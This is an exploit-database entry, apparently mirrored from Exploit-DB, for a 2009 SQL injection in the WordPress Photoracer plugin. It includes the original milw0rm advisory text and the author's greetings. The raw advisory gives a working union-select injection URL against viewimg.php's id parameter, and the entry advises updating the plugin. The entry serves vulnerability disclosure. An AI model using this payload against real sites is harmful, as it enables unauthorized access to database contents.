header-logo
Suggest Exploit
vendor:
Photoracer Plugin
by:
Kacper
7,5
CVSS
HIGH
SQL injection
89
CWE
Product Name: Photoracer Plugin
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

WordPress Photoracer Plugin => SQL injection

A SQL injection vulnerability exists in the Photoracer plugin for Wordpress. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the viewimg.php script with the id parameter set to a malicious SQL query. This can allow the attacker to gain access to sensitive information from the database.

Mitigation:

Update to the latest version of the Photoracer plugin.
Source

Exploit-DB raw data:

Wordpress Photoracer Plugin => SQL injection
http://wordpress.org/extend/plugins/photoracer/ 

Author: Kacper
Website: http://devilteam.pl/

Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum, 

Pozdro: Ratman, Kopaczka, FDJ

Elo: dla GLOBUSa za pomoc w crackowaniu hasel.

Vuln:

http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--

big thanks str0ke for you!

be safe all :)

# milw0rm.com [2009-06-15]

Navigation

Suggest Exploit

Services By CQR